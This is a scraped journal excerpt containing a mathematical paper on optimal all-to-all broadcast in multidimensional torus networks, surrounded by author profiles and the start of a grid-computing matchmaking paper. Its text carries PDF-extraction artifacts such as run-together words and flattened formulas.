International Journal of Computer Science and Network Security,
vol. 9, pp. 45-50, 2009.
AUTHORS PROFILE
Mohammed M. Kadhum is a lecturer in
the Graduate Department of Computer
Science, Universiti Utara Malaysia (UUM)and is currently attached to the
InterNetWorks Research Group at the UUMCollege of Arts and Sciences as a doctoral
researcher. He is currently pursuing his PhD
research in computer networking. His current
research interest is on Internet Congestion.
He has been awarded with several medals for
his outstanding research projects. Hisprofessional activity includes being
positioned as Technical Program Chair for
International Conference on Network
163 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 170/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009Applications, Protocols and Services 2008 (NetApps2008), which has been
held successfully in the Universiti Utara Malaysia. To date, he has published
various papers including on well-known and influential international journals.
Associate Professor Dr. Suhaidi Hassan is
currently the Assistant Vice Chancellor of
the College of Arts and Sciences, UniversitiUtara Malaysia (UUM). He is an associate
professor in Computer Systems and
Communication Networks and the former
Dean of the Faculty of InformationTechnology, Universiti Utara Malaysia.
Dr. Suhaidi Hassan received his BScdegree in Computer Science from
Binghamton University, New York (USA)
and his MS degree in Information Science(concentration in Telecommunications and
Networks) from the University of
Pittsburgh, Pennsylvania (USA). He received his PhD degree in Computing
(focussing in Networks Performance Engineering) from the University of
Leeds in the United Kingdom.
In 2006, he established the ITU-UUM Asia Pacific Centre of Excellence
(ASP CoE) for Rural ICT Development, a human resource development
initiative of the Geneva-based International Telecommunication Union (ITU)which serves as the focal point for all rural ICT development initiatives across
Asia Pacific region by providing executive training programs, knowledge
repositories, R&D and consultancy activities.
Dr. Suhaidi Hassan is a senior member of the Institute of Electrical and
Electronic Engineers (IEEE) in which he actively involved in both the IEEECommunications and IEEE Computer societies. He has served as the ViceChair (2003-2007) of the IEEE Malaysia Computer Society. He also serves as
a technical committee for the Malaysian Research and Educational Network
(MYREN) and as a Council Member of the Cisco Malaysia Network Academy.
164 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 171/215
On The Optimality Of All-To-All BroadcastIn k-ary n-dimensional Tori
Jean-Pierre Jung1, Ibrahima Sakho2
UFR MIM, Université de Metz
Ile du Saulcy BP 80794 - 57012 Metz Cedex 01 – France1jpjung@univ-metz.fr2sakho@univ-metz.fr
Abstract All-to-all broadcast is a collective communication in
a network with the constraint that every node must send to each
other certain piece of its data. This paper addresses the problem
of optimal all-port all-to-all broadcast in multidimensional tori.
The optimality criteria considered are the minimum exchange
steps, no duplicated data in the sense that only new data are
conveyed to receivers and the balance of the communication
links-load. It is proved that under these constraints, an optimalbroadcast is not feasible in any multidimensional torus. Then, the
tori which are capable of optimal broadcasts are characterized.
Keywords-MIMD computers; distributed memory ; interconnection
network; multidimensional torus; all-to-all broadcast; NODUP;
store-and-forward routing; message combining; ε εε ε -optimality.
I. INTRODUCTION
Parallel computers with distributed memory constitute anattractive alternative in the search of scalable architectures formassively parallel applications. Given the processorsinterconnection network, IN for short, of such computers,inter-processor communications, IPC for short, are realized by
passing messages. Then intensive IPC can rapidly result in abottleneck for the IN. In order to insure efficient IPC, severalIN have been proposed in the literature. Among them,cartesian product graphs which generalize multidimensionalmeshes and tori are more popular.
Among communication patterns that induce intensive IPC,collective communication as defined in [1], [2] has receivedconsiderable attention. Collective communication is acommunication pattern where a group of processors has toexchange data. Commonly used collective communication isthe one where the group of processors is constituted of all theprocessors. Examples of such communication are all-to-allpersonalized communication [3], [4] and all-to-all broadcast[5], [6]. While in all-to-all personalized communication eachnode has to send a distinct message to every other node, in all-to-all broadcast each node has to send the same message to allothers nodes. They are undoubtedly the most demanding forIN bandwidth and then the most demanding for executiontime.
All-to-all broadcast is important in numerous applicationsthat include protocols required for the control of distributedexecution and intensive computation. Examples of suchprotocols are decentralised consensus [7], coordination of distributed checkpoints [8] and acquisition of new global state
of a system [9]. Examples of intensive computation are sorting[10] and ordinary differential equation solving [11].
Performance models of all-to-all broadcast are generallybased on parameters as the number of data exchange steps, thesize of data exchanged at each step and the so-called NODUPin [19] which imposes the absence of redundancy that is everydata convey only new information to its receiver.
It is obvious that any k-ary n-dimensional torus can notrealise optimal all-to-all broadcast under all these constraints.The aim of this paper is then to characterize k-ary n-dimensional tori capable to realise such optimal all-to-allbroadcasts.
The remainder of the paper is organized in five sections.Section II presents the related works and Section III thecontext of the study. Section IV presents mathematicalproperties used in the next sections to characterize k-ary n-cube tori suitable for optimal all-to-all broadcast and SectionV the characterization of such tori. Section VI concludes thepaper and presents the perspectives for future works.
II. RELATED WORKS Beyond the works cited in Section I, several studies have
been conducted to devise efficient all-to-all broadcastalgorithms for multidimensional meshes and tori. They can beclassified in two main classes of algorithms: the directalgorithms like in [12] and [13] and the message combiningalgorithms like in [14], [15] and [16].
Direct algorithms aim at the minimisation of the number of data exchanges steps and then suppose that every pair of processors can directly exchange data. They then do not takeinto account the distance between the processors.
Message combining algorithms are more realistic. Theyaim at the minimisation of the size of the data exchanged ateach step. Then data destined for a processor are combined insuccessive exchanges steps to result in longer data and areduced start up cost.
Beyond these algorithms, there are other ones based on datapipelining techniques as described in [17] and [18].
In [20], the more general problem of methodologies fordevising optimal all-to-all algorithms is addressed; an optimalall-to-all broadcast algorithm is proposed for k-ary 2-dimensional tori. The constraints of such a broadcast are:- to route data on the shortest paths,
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 172/215
- to balance the link loads,- to receive each data piece one and only once.
III. PROBLEM DESCRIPTION
This section deals with the formulation of the optimal all-to-all broadcast problem. Definitions and properties of multidimensional tori which are essential for this formulation
will be given.
A. Definitions
1) k-ary n-dimensional torus: A k-ary n-dimensional torusis a network of kn nodes x(x1,x2,…,xi,...,xn) such as 0≤xi≤k-1and two nodes are connected if and only if their addressesdiffer by 1 [modulo k] on one and only one digit.
More formally, it is a cartesian product of n rings having knodes each one. Fig. 1 illustrates a bi-directional 5-ary 3-dimensional torus.
Fig. 1. Bidirectional 5-ary 3-dimensional torus
2) All-to-all broadcast: An all-to-all broadcast is a type of global communication in which each node has to broadcastthe same atomic data to the others nodes.
At the end of such a communication, each node must be inpossession of the data sent by all the nodes in the network.
Let T be the all-to-all broadcast time function.
3) Optimal all-to-all broadcast: An optimal all-to-all
broadcast is the one realized within the shortest time. Moreformally, an all-to-all broadcast A* is optimal if and only if T(A*) ≤ T(A) for any all-to-all broadcast A.
4) ε -optimal all-to-all broadcast: An ε-optimal all-to-allbroadcast is the one realized within the shortest realisabletime. More formally, an all-to-all broadcast A* is ε-optimal if and only if T(A*) < T(A) + ε for any all-to-all broadcast A.
B. Properties of k-ary n-cube tori
The following properties come from the structure of thetorus.
Property 1: Let d(x, y) be the distance between two nodes x
and y. d(x, y)=Σ1≤i≤nMin(|xi - yi|, k - |xi - yi|).
Property 2: The diameter of a k-ary n-dimensional torus isequal to n k/2 where r stands for the floor of r.
From Definitions 2-4, we can deduce the followingcharacterization of optimal broadcasts.
Proposition 1: A necessary and sufficient condition for an all-to-all broadcast to be optimal is that:a) each piece of data is received once and only once by each
node,b) data are routed on the shortest paths,c) link loads are balanced.
Proof: The proof of the necessary condition is straightforward.Indeed when conditions a), b) and c) are all verified, thebroadcast task is well balanced between all the nodes and thenthey all begin and end at the same time. Furthermore eachnode does just that is necessary. To prove the sufficientcondition, suppose that one and only one of the conditions a),b), and c) is not verified.• The condition a) is not verified. Necessarily, at some steps,
at least one node receives data whose one piece isredundant. One of useful pieces of data which should bereceived instead of the redundant one has been necessarilysent by an other node. Thus there is a node which, at this
step, has sent a larger piece of data which requires moretime.
• The condition b) is not verified. Then more time isrequired to convey the data to their destination.
• The condition c) is not verified. Then overloaded links willtake more time to transfer their data.
In any case, the data transfer requires more time; theresulting broadcast can not be optimal. At the best, it is ε-optimal.
We can deduce from this proposition that in an optimal all-to-all broadcast, the number of the data exchanges stepsbetween adjacent nodes has to be equal to the diameter of thetorus, at each step the amount of data to exchange has to bethe same on each link and the data must be routed on theshortest paths.
IV. MATHEMATICAL FOUNDATIONS
This section presents the mathematical properties used inthe next sections to devise the conditions under which optimalall-to-all broadcast can be performed on a k-ary n-dimensionaltorus.
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 173/215
A. Definitions
In the remainder of the paper, we will use the followingequivalent definition of a k-ary n-cube torus instead of the onegiven in the previous section.
1) k-ary n-dimensional torus: Equivalently to the
previous definition, a k-ary n-dimensional torus can also beviewed as a network of kn nodes x(x1, x2, … , xi ,... , xn) suchas -k/2≤xi≤k/2) and two nodes are connected if and only if their addresses differ by 1 [modulo k] on one and only onedigit.
2) The reference node: A reference node of a k-ary n-dimensional torus is a node from which the topological viewof the k-ary n-cube is identical to the one from any other node.
By definition of the k-ary n-dimensional torus, it is obviousthat any node can be the reference node. In the sequel, thiswill be the node which has all its coordinates equal to 0. It willbe distinguished, as illustrated in Fig. 2, by a small black
square.3) Boundary node: A boundary node of a k-ary n-
dimensional torus is a node which, observed from thereference node, possesses a wraparound link.
4) Quadrant: A quadrant of a k-ary n-dimensionaltorus is the set of the nodes whose the coordinates, in anydimension, are both positive or both negative.
For instance, in the k-ary n-dimensional of Fig. 2 there arefour quadrants, one of which, the North-West quadrant, isconstituted of the nodes x(x1, x2) such as x1 ≤ 0 and x2 ≥ 0.
Fig. 2. 5-ary 2-dimensional torus
B. Properties
Let:
C(m,p) be the number of combinations of p elementsamong m,
exp(q,m) be the exponent of the prime factor q in thedecomposition of m,
M(p, v)(n, k, t) be the cardinal of the set of the nodes of a k-ary n-dimensional torus located at distance t from the
reference node and having exactly p of their coordinates equalto v.
Proposition 2: Let In,p be the set of the subsets of the n firstnon null natural integer of cardinality p.
M(p,v)(n,k,t)=G(p,v)(n,k)*C(n,p)*N(p,v)(n,k,t)
where:
2n-p if v = 0G(p, v)(n, k)= if k is odd.
2n otherwise
1 if v = 0G(p, v)(n, k)= if k is even.
2p otherwise
|{x:xi≥0 and Σi∉I xi=t-pv}| if k is odd
N(p, v)(n,k,t)=
∑0≤ h≤n-p 2n-p-h*|{x≥0:Σi∉I|xi|=t-pv-hk/2}|
otherwise.
Proof: By definition,
M(p, v)(n,k,t)=|∪I∈In,p{x:|xi|≤k/2,Σ1≤i≤n|xi|=t and
|xi|=v if i∈I}|
=∑
I∈In,p |{x:Σi∉I |xi| = t-pv}|. Let Q be the set of quadrants of the k-ary n-dimensional torusaccording to the reference node.
M(p,v)(n,k,t)=∑ I∈In,p ∑Q∈Q|{x∈Q:Σi∉I|xi|=t-pv}| =In,p*∑Q∈Q|{x∈Q:Σi∉I|xi|=t-pv}| =C(n,p)*∑Q∈Q|{x∈Q:Σi∉I|xi|=t-pv}|.
Two situations may arise according to the parity of k.
Case 1: k is odd. As illustrated in Fig. 2, all the quadrants are
structurally identical. Then it is sufficient to reason on one of the quadrants. Let's consider, for instance, the quadrant:
Q={x:xi=v if i∈I and xi≥0 otherwise}.
∑Q∈Q|{x∈Q:Σi∉I |xi|=t-pv}|=|Q|*|{x∈Q:Σi∉I |xi|=t-pv}|
and then:
M(p, v)(n,k,t)=C(n,p)*G(p, v)(n,k)*N(p, v)(n,k,t)
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 174/215
with:
2n-p if v = 0G(p, v)(n, k) =
2n otherwise,
N(p, v)(n,k,t)= |{x:xi≥0 and
Σi∉I xi=t-pv}
|.
Case 2: k is even. Again:
M(p,v)(n,k,t)=C(n,p)*∑Q∈Q|{x∈Q:Σi∉I|xi|=t-pv}|.
However, the quadrants are no more structurally identical.Indeed, they have not the same number of boundary nodes asillustrated in Fig. 3 for the 4-ary 2-dimensional torus.
Fig. 3. 4-ary 2-dimensional torus
Then, according to set of the nodes x having h coordinates x i,for i∉I, equal to k/2:
M(p, v)(n,k,t)=C(n, p)*∑0≤h≤n|{x:Σi∉I|xi|=t-pv-hk/2}|.
Let's embed the k-ary n-dimensional torus in a (k+1)-ary n-dimensional torus. As illustrated in Fig. 4, the quadrantsbecome structurally identical but with each boundary nodeappearing redundantly 2h times for 0≤h≤n-p.
Fig. 4. 4-ary 2-dimensional torus embedded in 5-ary 2-dimension torus
Redundant boundary nodes are illustrated in Fig. 4 by whiteEast (resp. South) boundary nodes which are duplicates of theWest (resp. North) black boundary nodes while their inducedredundant links are illustrated by the dotted links.
Then, from the odd-arity case:
M(p, v)(n,k,t)=C(n,p)*∑0≤h≤ n-p G'(p, v)(n,k) / 2h*{x:xi≥0 and
Σi∉I |xi|=t-pv-hk/2}| =C(n,p)*G'(p, v)(n,k) / 2n-p
* N(p, v)(n,k,t).
From where the expected results:
G'(p, v)(n,k)=G(p, v)(n,2k'+1)
N(p, v)(n,k,t)=∑0≤ h≤n-p 2n-p-h*|{x≥0:Σi∉I|xi|=t-pv-hk/2}|.
Let (sr, r ≥ 0) be the recursive sequence whose general termis defined as:
1 if r = 0sr =
(sr-1)q-1 σr-1 otherwise
where (sr-1)q-1 stands for (q-1) times the terms of sr-1 and σr-1
stands for the sequence sr-1 whose last term is incremented by1. For instance for q = 3 and r = 3 we obtain:
s0 = 1 s1 = 1 1 2 s2 = 1 1 2 1 1 2 1 1 3 s3 = 1 1 2 1 1 2 1 1 3 1 1 2 1 1 2 1 1 3 1 1 2 1 1 2 1 1 4
Let sr(m) be the m-th term of the sequence s r and mi the i-thdigit of m in the base q.
Lemma 1: ∑1≤i≤msr(i)=∑0≤i≤logm m/qi.
Proof: We know from the decomposition of an integer in a
base q that m=∑0≤i≤logmmiqi. Consequently, in accordance
with the recursive nature of the sequence s r and the fact thatmi<q it follows that:
∑1≤i≤msr(i)=∑
0≤i≤logm mi∑
1≤ j≤qi si(j).
From the definition of si, we know that:
∑1≤ j≤qisi(j)=(q-1)*∑1≤ j≤ q(i-1)si-1(j)+∑1≤ j≤q(i-1)σi-1(j)
=(q-1)*∑1≤ j≤q(i-1)si-1(j)+∑1≤ j≤q(i-1)si-1(j)+1
=q*∑1 ≤ j ≤ q(i-1)si-1(j)+1
By iteration, using similar reasoning, we obtain:
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 175/215
∑1 ≤ j ≤ qisi(j)=q2*∑1 ≤ j ≤ q(i-2)si-2(j)+q+1
=∑0 ≤ j ≤ i q j.
Therefore:
∑1 ≤ i ≤ msr(i) = ∑0 ≤ i ≤ logm mi∑0 ≤ j ≤ i q j.
Let's consider the following triangular matrix organisationof the terms of the second member.
i = 0 m0 i = 1 m1 m1qi = 2 m2 m2q m2q
2 …i = logqm mlogm mlogmq mlogmq2 …mlogmqlogm
Summing the terms on the same diagonal we obtain:
∑i≤ j≤logm-i m jq j=∑
0≤ j≤logmm jq j /qi=m/qi
from where:
∑1≤i≤msr(i)=∑0≤i≤logm m/qi.
Lemma 2: exp(q, p!) = ∑1≤ j≤1+log(p/q) p/q j.
Proof: By definition,
exp(q,p!)=∑1≤m≤pexp(q,m).
As the only values of m for which exp(q,m) is non null are themultiples of q, the above relation becomes:
exp(q,p!)=∑1≤ j≤ p/qexp(q,j*q)
where:
1 if j < q
exp(q, j*q)= 1+exp(q, j) if j is a power of q
exp(q, j*q mod (q1+ logq)) otherwise.
In others words the sequence (exp(q,j*q),1≤ j≤p/q) isstraightforwardly a subsequence of sr with r ≥ logqp/q.Then, from Lemma 1 it comes that:
exp(q, p!)=∑1≤ j≤ p/q sr(j)
= ∑0≤ j≤log p/q p/q /q j
= ∑0≤ j≤log p/q p/q j+1
= ∑1≤ j≤1+log p/q p/q j.
Lemma 3: Let Cp=∑1≤ j≤1+ log((n-p)/q) (n-p)/q j.
Cp=(1/(q-1))((n-p)- (∑0≤ j≤αn j-∑0≤ j≤βp j))– Card{1≤ j≤β:
∑0≤i≤ j-1niqi < ∑0≤i≤ j-1 piq
i}.
Proof: Let's consider that:
n=∑0≤i≤α niqi with α=logqn
p=∑0≤i≤βpiqi with β=logqp.
Then, as n > p:
n-p=∑0≤i≤α(ni-pi)qi (n-p)/q j=∑ j≤i≤α(ni-pi)q
i-j+c j
-1 if ∑ j≤i≤α (ni-pi)qi<0
where c j =0 otherwise.
Cp=∑1≤ j≤α(n-p)/q j
=∑1≤ j≤α∑ j≤ i≤α(ni-pi)qi-j+∑1≤ j≤ αc j
=∑1≤ j≤α∑ j≤i≤α(ni-pi)qi-j-Card{1≤ j≤β:
∑0≤i≤ j-1niqi<∑0≤i≤ j-1piq
i}
=∑1≤ j≤α ∑ j≤i≤α niqi-∑1 ≤ j≤β∑ j≤i≤βpiq
i-Card{1≤ j≤β:
∑0≤i≤ j-1niqi<∑0≤i≤ j-1piq
i }.
As in the proof of Lemma 1, the terms of ∑1≤ j≤α∑ j≤i≤αniqi canbe organized in the following triangular matrix:
j = α nα j = α-1 nα-1 nαq j = α-2 nα-2 nα-1q nαq
2 …
j = 1 n1 n2q n3q2 … nαq
α-1
Summing the terms on the same diagonal we obtain that:
∑1≤ j≤ α∑ j≤i≤αniqi=∑1≤ j≤αn j∑0≤i≤ j-1q
i
=(1/(q-1))∑1≤ j≤α n j(q j-1)
= (1/(q-1))(∑1≤ j≤αn jq j)-∑1≤ j≤αn j)
= (1/(q-1))(n-∑0≤ j≤αn j).Similarly:
∑1≤ j≤β∑ j≤i≤βpiqi =(1/(q-1))(p-∑0≤ j≤βp j)
from where, we obtain the expected result.
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 176/215
V. CHARACTERIZATION OF THE OPTIMALITY
The aim of this section is to characterize k-ary n-dimensional tori capable of optimal all-to-all broadcasts suchas data are routed on shortest paths, received only once byeach node, and link loads are balanced.
According to these constraints, given the incrementalconstruction of the torus, at step t of the broadcast each datahas to move in a descending construction order of the torus.This move can be realized according to several equivalentstrategies. Such a strategy can be as simple as to movetowards one of the nearest axis or the farthest axis of the toruswith a smaller dimension. So let's choose the move-towards-one-of-the-nearest-axis strategy. This strategy partitions thenodes located at a given distance from the reference node intothe classes of nodes at distance 0,1,… from one or morenearest axis. The nodes belonging to a same class can also bepartitioned into classes of nodes having, in this order, exactlyn,n-1,…,1 identical coordinates.
As each piece of data located at a distance t from thereference node and having exactly p of its coordinates equal tov can be routed to the reference node only on the p axis fromwhich it is at distance v, a sufficient and necessary conditionfor an optimal all-to-all broadcast is that for any t, M (p, v)(n, k,t) must be divisible by the number of the incoming axis of anynode which is equal to 2n.
Lemme 4: 2n does not divide N(p, v)(n, k, t).
Proof: Let q be a prime factor of 2n. From Proposition 2,
1 if k is oddN(p, v)(n,k,n(v+1)-p) =
2n-p otherwise.
Then:- if q≠2: exp(q,N(p, v)(n,k,t))<exp(q,2n),- if q=2: for k odd, N(p, 0)(n,k,n-p)=1 and again:
exp(q,N(p, v)(n,k,t))<exp(q,2n).
Lemma 5: A necessary and sufficient condition for 2n todivide G(p, v)(n,k)C(n,p) is that:
Card{ j≤β:∑0≤i≤ j-1niqi<∑0≤i≤ j-1piq
i }≥Card{ j≤α:
∑0≤i≤ j-1niqi=0}-exp(q,Q(p, v)(n,k))+exp(q,2)
where α=logqn and β=logqp, for any prime factor q of nand p.
Proof: Let's recall that 2n divides G(p,v)(n,k)C(n,p) means thatfor any prime factor q of 2n and G (p, v)(n,k)C(n,p) we have:
exp(q,2)+exp(q,n)≤exp(q,G(p, v)(n,k))+exp(q,C(n,p))
According to the expression of G(p,v)(n,k) from Proposition 2,two situations may arise.
Case 1: q≠2. In this case we have exp(q,2)=0 and exp(q,G(p,
v)(n,k))=0. Then the above inequality becomes:
exp(q,n)≤exp(q,C(n,p))Let's recall that:
C(n,p)/n =(n-1)(n-2)… (n-p+1)/p!
and that, from Lemma 2:
exp(q, p!) = ∑1≤ j≤1+log(p/q) p/q j.
From the same lemma we also know that:
exp(q,(n-1)(n-2)… (n-p+1))=∑1≤ j≤1+log((n-1)/q) (n-1)/q j -
∑1≤ j≤1+log((n-p)/q) (n-p)/q j.
Indeed,
(n-1)(n-2)… (n-p+1)=(n-1)!/(n-p)!.
We know from Lemma 3 that:
C1=(1/(q-1))((n-1)-(∑0≤ j≤αn j-1))-Card{1≤ j≤β:∑0≤i≤ j-1niqi< 1}
=(1/(q-1))((n-1)-(∑0≤ j≤αn j-1))-Card{1≤ j≤β:∑0≤i≤ j-1 niqi = 0}.
Similarly,
∑1≤ j≤1+logp/q)p/q j=(1/(q-1))(p-∑0≤ j≤βp j).
By substituting to each term for its value in the abovedivisibility condition, we obtain the expected relation with thetwo last terms of the second member being equal to 0.
Case 2: q=2. In this case, exp(q,2)=1 and exp(q,G(p, v)(n,k))=0or n-p. Then the divisibility condition becomes:
1+exp(q,n)≤exp(q,G(p, v)(n,k))+exp(q,C(n,p)).
By a reasoning similar to the one used for the case where q≠2,we obtain the desired relation.
At this point of our characterization, we have to specifythe values of n which satisfy the condition of Lemma 5. Againthis depends on the values of q.
Case 1: q ≠ 2. The question is to know if there is n such as:
Card{ j≤β:∑0≤i≤ j-1niqi<∑0≤i≤ j-1 piq
i}≥Card{ j≤α:
∑0≤i≤ j-1niqi=0}
for any p < n.
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 177/215
The answer is definitively no. It suffices indeed to take p=q.Therefore the only values of n which are candidates are thosewhich do not admit no other prime factor else q=2, that is, thevalues of n which are powers of 2.
Case 2: q=2. The question is to know if there is n, equal to apower of 2 and strictly greater than any p, such as:
Card{ j≤β:∑0≤i≤ j-1niqi<∑0≤i≤ j-1piq
i }≥Card{ j≤α:
∑0≤i≤ j-1niqi=0}-exp(q,G(p, v)(n,k))+1.
Two situations may arise according to the values of k.
Case 2.1: k is odd. As G(p, v)(n, k) may take different valueswe just have to verify the relation for the maximum of allvalues of the second member of the inequality which isattained for the minimum value of exp(q, G(p, v)(n, k)) that is2n-p. Then we have:
Card
{ j≤β:∑
0≤i≤ j-1n
i2i<∑
0≤i≤ j-1p
i2i
}≥Card
{ j≤ α:
∑0≤i≤ j-1ni2i=0}-n+p+1
where n=2r. Again let's consider the maximum of the secondmember of the inequality for all values of p=2 r-2. We obtain:
Card{ j≤α:∑0≤i≤ j-1ni2i=0}-n+p+1=r-1
Card{ j≤β:∑0≤i≤ j-1ni2i<∑0≤i≤ j-1pi2
i}=r-1
The inequality is then true.
Case 2.2: k is even. By the same reasoning as the case where
k is odd, we have to verify the following inequality:
Card{ j≤β:∑0≤i≤ j-1ni2i<∑0≤i≤ j-1 pi2
i}≥Card{ j≤α:
∑0≤i≤ j-1ni2i=0}+1.
Again, from the case where q≠2, this relation can not be true.Indeed, it suffices to take p=2.
We can summarize this discussion by the followingcharacterization which confirms the results obtained in [20]for k-ary 2-dimensional tori.
Theorem: A necessary and sufficient condition for an all-to-all broadcast to be optimal in a k-ary n-dimensional torus isthat n is a power of 2 and k is odd.
VI. CONCLUSION
This paper devised the conditions for optimal all-to-allbroadcast in k-ary n-dimensional tori. Such a broadcast has tosatisfy routing on the shortest paths while balancing the link-loads and minimizing the switching process at each node. Thesatisfaction of the balance of the link loads constraintsimposes that the amount of data received on each link at each
node has to be identical at each step of the broadcast;furthermore there must exist a partition of the data received ateach node such as the cardinality of each element of thepartition is divisible by the number of links.
The paper proves that such a partition can be built only fork-ary n-dimensional tori for which k is odd and n is a powerof 2. In any other case, any all-to-all broadcast algorithm, at
best, is ε-optimal but not optimal.Then the objectives of the future works on this subject are
double. On one side they will concern the study of the best all-to-all broadcast when k is even or n is not a power of 2. Onthe other side they will concern the study of the best suitedswitching processes in order to obtain efficient all-to-allbroadcast, whatever are the arity and the dimension of the tori.
REFERENCES [1] P.K. McKinley and Y.-J. Tsai, D. Robinson, "Collective
communication in wormhole-routed massively parallel computers",Computer , pp. 62-76, June 1993.
[2] D.K. Panda, "Issues in designing efficient and practical algorithm forcollective communication on wormhole-routed systems", in Proc.
ICCP Workshop on Challenges for Parallel Processing, 1995, p. 8.[3] S. Hinrichs, C. Kosak, D.R. O'Hallaron, T.M. Sticker and R. Take,
"An architecture for optimal all-to-all personalised communication",in Proc. Symp. Parallel Algorithms and Architectures, 1994, p. 310.
[4] S.L. Johnsson and C.T. Ho, "Optimum broadcasting and personalisedcommunication in hypercubes", IEEE. Trans. Computers, vol 38, pp.1249-1268, Sept. 1989.
[5] D.M. Topkis, "All-to-all broadcast by flooding in communicationsnetworks", IEEE. Trans. Computers, vol 38, pp. 1330-1332, Sept.1989.
[6] M.-S. Chen, J.-C Chen, and P. S. Yu, "On general results for all-to-all broadcast", IEEE. Trans. on Parallel and Distributed Systems,7(4), pp. 363-370, Sept. 1996.
[7] M.-S. Chen, K.-L. Wu and P. S. Yu, "Efficient decentralisedconsensus protocols in a distributed computing systems", in Proc. of
International Conference on Distributed Computing Systems, 1992,
p. 426.[8] T. V. Lakshman and A. K. Agrawala, "Efficient decentralised
consensus protocols", IEEE. Trans. on Software Engineering, vol 12,pp. 600-607, May 1986.
[9] [9] S. B. Davidson, H. Garcia-Molina and D. Skeen, "Consistency inpartitioned networks", ACM Computing Surveys, vol. 17, n°. 13, pp.341-370, Sept. 1985.
[10] S. Rajasekaran, "k-k Routing, k-k Sorting and Cut-through Routingon the mash", J. of Algorithms, vol. 19, pp. 361-382, March 1995.
[11] P.S. Rao and G. Mouney, "Data communications in parallel block-predictor-corrector methods for solving ODEs", LAAS-CNRS,France, Technical Report, 1995.
[12] D.S. Scott, "Efficient all-to-all communication patterns in hypercubeand mesh topologies", in Proc. Sixth Conf. Distributed Memory
Concurrent Computers, 1991 p. 398.[13] R. Thakur, and A. Choudhray, "All-to-all communication on meshes
with wormhole routing", in Proc. Eighth Int. Parallel ProcessingSymp., 1994, p. 561.
[14] S.H. Bokhari and H. Berryman, "Complete exchange on a circuitswitched mesh", in Proc. Scalable High Performance Computing
Conf., 1992, p. 300.[15] Y.-J. Suh and S. Yalamanchili, "All-to-all communication with
minimum start-up costs in 2D/3D Tori and Meshes", IEEE. Trans. on
Parallel and Distributed Systems, 9(7), pp. 442-458, May 1998.[16] Y.-J. Suh and K. G. Shin, "All-to-all personalised communication in
multidimensional torus and mesh networks", IEEE. Trans. on
Parallel and Distributed Systems, 12(1), pp. 38-59, January 2001.[17] Y. Yang and J. Wang, "Pipelined all-to-all braodcast in all port
meshes and tori", IEEE. Trans. on Computers, vol. 50, pp. 567-582,June 2001.
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 178/215
[18] Y. Yang and J. Wang, "Near-Optimal all-to-all braodcast inmultidimensional all port meshes and tori", IEEE. Trans. on Parallel
and Distributed Systems, 13(2), pp. 128-141, February 2002.[19] S.M. Hedetniemi, S.T. Hedetniemi and A. Liestman, "A survey
broadcasting and gossiping in communications networks", Networks,vol.18 pp. 319-351, 1988.
[20] J-P. Jung and I. Sakho, "A methodology for devising optimal all portall-to-all broadcast algorithms in 2-dimensional tori", in Proc. of
IEEE LCN , 2003, p. 558.
AUTHORS PROFILE
Jean-Pierre Jung received the PhD in computer science in1983 at the University of Metz. From 1983 to 1994 he wasAssistant Professor at the University of Metz. Since 1994 he isProfessor at the Dpt. of Computer Science of the University of Metz where he teaches script and system programming. The
research area of Prof. Jung concerns CAD and parallel anddistributed systems.Ibrahima Sakho received the PhD in applied mathematics in1987 at the Institut National Polytechnique de Grenoble. From1987 to 1992 he was at the Institute des MathématiquesAppliquées de Grenoble where he worked in the europeansupercomputer project Supernode, then from 1992 to 1997 at
the École des Mines de St-Etienne where he was the head of the Parallel and Distributed Systems team. Since 1997 he isProfessor at the University of Metz where he teachescomputer architecture, parallel and distributed systems andmaking decision under uncertainty. The research of Prof.Sakho addresses the design of parallel and distributedalgorithms and the algorithmic of the control of these systems.
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 179/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No.1, 2009
Resource Matchmaking Algorithm using Dynamic
Rough Set in Grid Environment
Iraj Ataollahi
Computer Engineering DepartmentIran University of Science and Technology
Tehran, Iran
ir_ataollahi@mail.iust.ac.ir
Morteza Analoui
Computer Engineering DepartmentIran University of Science and Technology
Tehran, Iran
analoui@iust.ac.ir
Abstract— Grid environment is a service oriented infrastructure
in which many heterogeneous resources participate to provide
the high performance computation. One of the bug issues in the
grid environment is the vagueness and uncertainty between
advertised resources and requested resources. Furthermore, in
an environment such as grid dynamicity is considered as a crucial
issue which must be dealt with. Classical rough set have been
used to deal with the uncertainty and vagueness. But it can just
be used on the static systems and can not support dynamicity in asystem. In this work we propose a solution, called Dynamic
Rough Set Resource Discovery (DRSRD), for dealing with cases
of vagueness and uncertainty problems based on Dynamic rough
set theory which considers dynamic features in this environment.
In this way, requested resource properties have a weight as
priority according to which resource matchmaking and ranking
process is done. We also report the result of the solution obtained
from the simulation in GridSim simulator. The comparison has
